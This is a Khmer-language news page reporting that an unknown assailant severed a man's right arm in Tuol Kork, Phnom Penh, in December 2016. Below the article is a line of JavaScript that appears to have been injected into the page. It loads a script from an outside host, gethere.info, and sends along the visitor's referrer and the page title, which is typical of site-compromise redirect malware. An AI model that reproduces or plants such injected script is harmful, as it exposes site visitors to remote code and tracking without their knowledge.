Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

បុរសម្នាក់ត្រូវជនមិនស្គាល់មុខកាប់ដាច់ដៃម្ខាងនៅខណ្ឌទួលគោក

ភ្នំពេញ៖ បុរសម្នាក់បានដួលសន្លប់ស្តូកស្តឹងត្រូវជនមិនស្គាល់មុខកាប់បណ្ដាលអោយដាច់ដៃខាងស្តាំម្ខាងសង្ស័យជារឿងគំនុំ។ ហេតុការណ៍ដ៍រន្ធត់នេះកើតឡើងនៅវេលាម៉ោង៩និង១០នាទីយប់ត្រូវនឹងថ្ងៃទី១៣ ខែធ្នូ ឆ្នាំ២០១៦ ស្ថិតនៅចំណុចស្តុបត្រឡោកបែក ក្នុងសង្កាត់បឹងកក់២ ខណ្ឌទួលគោក។

 
ប្រភពនៅកន្លែងកើតហេតុបានអោយដឹងថា មុនកើតហេតុគេឃើញបុរសម្នាក់អាយុជាង២០ឆ្នាំ សម្បុរខ្មៅស្រអែមស្លៀកខោខ្មៅជើង វែងពាក់អាវសឆ្នូតដៃវែង បានដើរតាមផ្លួវ៥៩៨ ពីត្បងទៅជើងដោយដៃម្ខាងត្រូវគេកាប់ស្ទើរដាច់ខាងស្តាំទាំងមូលមានឈាមហូរកខ្លាក់មិនដឹងជាមានរឿងអ្វី ស្រាប់តែដើរមកដល់ក្បែរខារ៉ាអូខេ Best Star ក៍ដួលសន្លប់បាត់បង់ស្មារតីស្តូកស្តឹងនៅនិងកន្លែងសង្ស័យជារឿងករណីគំនុំកាប់សម្លាប់។
ក្រោយកើតហេតុសមត្ថកិច្ចមូលដ្ឋានបានចុះមកដល់កន្លែងកើតហេតុ ទាក់ទងហៅរថយន្តមកដឹកយកទៅសង្គ្រោះបាត់ទៅ។ដោយ៖ព្រះអង្គខ្មៅមានរិទិ្ធ

https://youtu.be/Cr1Pl9hhb1E

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More